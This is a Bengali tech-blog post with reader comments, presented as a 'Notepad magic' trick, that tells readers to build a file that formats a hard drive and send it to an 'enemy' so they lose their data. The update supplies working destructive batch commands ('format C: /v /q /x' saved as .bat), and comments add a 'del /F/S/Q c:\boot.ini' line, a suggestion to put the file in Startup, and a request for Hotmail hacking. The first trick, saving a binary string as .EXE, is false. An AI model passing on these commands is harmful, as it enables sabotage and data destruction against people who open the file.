আপনি কি নোটপ্যাড কে অর্থহীন ভাবেন ? নোটপ্যাড যাদু – পর্ব (১০)(Update)

আপনি যদি নোটপ্যাড কে অর্থহীন বা বেকার একটা সফ্ট ভাবেন তাহলে আমি বলবো আপনি ভূল।কারণ নোটপ্যাড দিয়ে যে অনেক কিছু করা যায় খুব সহজে।আপনি জানেন না বলে আপনার কাছে নোটপ্যাড কে অর্থহীন মনে হয়।যা হোক তবে আমি যত দিন আছি ততদিন আপনাকে নোটপ্যাডের ট্রিকসগুলা জানিয়ে যাব,যা আমার কাছে সব সময় মনে হয় নোটপ্যাডের যাদু।তাই আজও একটি নতুন নোটপ্যাড যাদু (ট্রিকস) নিয়ে টিউন করবো যেটি আপনাকে খুব সহজে একটি HDD ফরম্যাট করে দেবে।

কি ভাবে নোটপ্যাড দিয়ে একটি HDD ফরম্যাট করবেন ?

১. * নতুন নোটপ্যাড ওপেন করুন।
২. * নিম্নলিখিত কোডটি কপি পেষ্ট বা টাইপ করুন।
01001011000111110010010101010101010000011111100000

৩.* এবার যে কোন নামের পর .EXE লিখে সেভ করুন।
৪.* এবার এটা আপনার শত্রুকে পাঠিয়ে দিন এবং অপেক্ষা করুন কখন সে ফাইলটি ডাবল ক্লিক করে এবং তার সর্ম্পূণ HDD ফরম্যাট হওয়ার দুঃখে কাঁদতে বসে।শুধু মাত্র একটি ড্রাইভ ফরম্যাট করতে নিচে দেখুন -

Update

সি ড্রাইভ ফরম্যাট করতে - format C: /v /x লিখে যে কোন নামের পর.bat লিখে সেভ করুন।একই ভাবে অন্য ড্রাইভ ফরম্যাট করতে শুধু “C” এর জাগায় E.G.D.ইত্যাদি ব্যবহার করুন।
তারাতারি ফরম্যাট করতে মাঝে /q যোগ করুন,যেমন - format C: /v /q /x

* /q তে দ্রুত ফরম্যাট,
* /v তে ভলিউম লেবেল,
* /x তে পার্টিশন ফরম্যাট হবে।

Level New

আমি মঈনুল হক। বিশ্বের সর্ববৃহৎ বিজ্ঞান ও প্রযুক্তির সৌশল নেটওয়ার্ক - টেকটিউনস এ আমি 15 বছর 11 মাস যাবৎ যুক্ত আছি। টেকটিউনস আমি এ পর্যন্ত 159 টি টিউন ও 299 টি টিউমেন্ট করেছি। টেকটিউনসে আমার 1 ফলোয়ার আছে এবং আমি টেকটিউনসে 0 টিউনারকে ফলো করি।

সব সময় নতুন কিছু শিখতে চেষ্টা করি ..........


টিউনস


আরও টিউনস


টিউনারের আরও টিউনস


টিউমেন্টস

নোটপ্যাড আসলেই অর্থহীন যদি না থাকে মইন। দারুন লিখেছেন।

    এ্কমত হলাম । মইন ভাই ,কি করে এই সকল tips এক জায়গায় পাওয়া যাবে?

    Level New

    এক জাগায় পাওয়া মুশকিল ……আর সার্চ করে বের করা কঠিন কারণ একি লেখা কম করে হলেও ৫০০ সাইটে পাবেন।আর যা পাবেন তা আমাদের টেকটিউনসেও আছে …….

Level 2

Excellent tune!!!!!!!!!
I am Successful in my another HDD !!

Level 0

format c:\ /Q/X ata ki নোটপ্যাড a likhte hobe

    Level New

    আশা করি এবার বুঝতে পারবেন।

যে কারো PC-এর বারোটা বাজানোর জন্য যথেষ্ট।
অনেক ধন্যবাদ মঈন ভাই……

Thanks for the tune.
Note pad diye ki email hack kora jay ?
hotmail hack korar upay jante chai.

[email protected]

আপনাকে অনেক ধন্যবাদ।

Level 0

আগে ভাবতাম, ইদানিং ধারনা পাল্টাচ্ছে।

Level 0

ভাই আমি আপনার ভক্ত যাই হউক সামনে দিনের জন্য বসে থাকলাম তারাতারি>>>>>>>>>>>>>

৪.* এবার এটা আপনার “””স্ত্রুকে””” পাঠিয়ে দিন এবং অপেক্ষা করুন কখন সে ফাইলটি ডাবল ক্লিক করে এবং তার সর্ম্পূণ HDD ফরম্যাট হওয়ার দুঃখে কাঁদতে বসে।

কথাটা বুঝলাম না মঈন ভাই

    Level New

    আপনি নিশ্চয় আপনার নিযের বা বন্ধুর সর্ম্পূণ HDD ফরম্যাট করবেন না তাই এখানে শত্রুর কথা বলা হয়েছে।

মঈন ভাই, আমি যদি
format c:\ /Q/X
01100110011011110111001001101101011000010111010000
100000011000110011101001011100
0010000000101111010100010010111101011000

এই কোড লিখে EXE আকারে সেভ করে Startup ধরিয়ে দেই তাহলে কি কাজ করবে……????

    Level New

    ট্রাই করেন …..

Level 2

নিচের কোডটি কপি পেষ্ট করে del /F/S/Q c:\boot.ini লিখে সেভ,,নোটপ্যাড a likhte hobe

    Level New

    না …. নামের জাগায় del /F/S/Q c:\boot.ini লিখে সেভ করতে হবে।

Level New

মঈন ভাই আমিত ট্রাই করলাম। কিন্তু কাজ করেনি। আপনি যে ভাবে লিখলেন টিক সেইভাবে আমি কাজ করলাম কিন্তু কি হল ? একটি নাম দেয়ারপর .EXE দিয়া সেইভ করলাম করার পর ডাবল ক্লিক করালাম তারপর আসে I agore তাতে ক্লিক করারপরো কিছু হল না। এখন কি করব একটু বলবেন কি ? আমার মনেহয় আমার কোন জায়গায় ভুল হচ্ছে।

Level 0

ক্ষতি না করে উপকার কি করা যায় তা ভাবলে কি হয় না??

Level 0

মইন ভাই অবশ্যই দেখবেন,ভাই অনেক চেষ্টা করলাম পারলাম না দয়া করে আর একটু বুঝি দিন না হলে বেইজত হয়ে যাবো|

Level 0

ভাই নিরাশ করবেন না, দয়া করে ছোট ভাই মনে করে সমাধান দিতেন?

    Level New

    Update দেখেন ………. কাজ হবেই ………

ফাটিয়ে ডেয়াসেন গুরু ।

Level 0

মইন ভাই কাজ করার চেষ্টায় থাকলাম সমস্যা হলে একটু সাহায্য কইরেন, ধন্যবাদ ছোট ভাইরে সাহায্য করার জন্য।

Level 0

মইন ভাই,কোন কোড গুলো ব্যবহার করবো আর কিভাবে নেটপ্যাডে বসাবো যদি একটু বলেন>>>>>>>>>>>>>>>>>>>>এটা না করতে পারলে ঘুম আসবে না

    Level New

    format C: /v /q /x লেখাটি কপি করুন,এবার একটি নোটপ্যাড ওপেন করে লেখাটি পেষ্ট করুন তারপর file > Save as ক্লিক করুন, তারপর file name এ format.bat লিখে Save ক্লিক করুন।এবার যেখানে ফাইলটি সেভ করেছেন সেখানে গিয়ে ফাইলটি ডাবল ক্লিক করুন।

Level 2

নোটপ্যাডের যাদু দেখতে গিয়ে আমার HDD ফরম্যাট হয়ে গিয়েছে।

Level 0

মইন ভাই এটা করা পর,একটি কমান্ড চালু হয়ে দুইবার enterদিলে format হয়,কিন্ত ডাবল ক্লিক করে তো format হচেছ না?আর পুরো HDD করার Update টা?
ছোট ভাই

ভালো হয়েছে।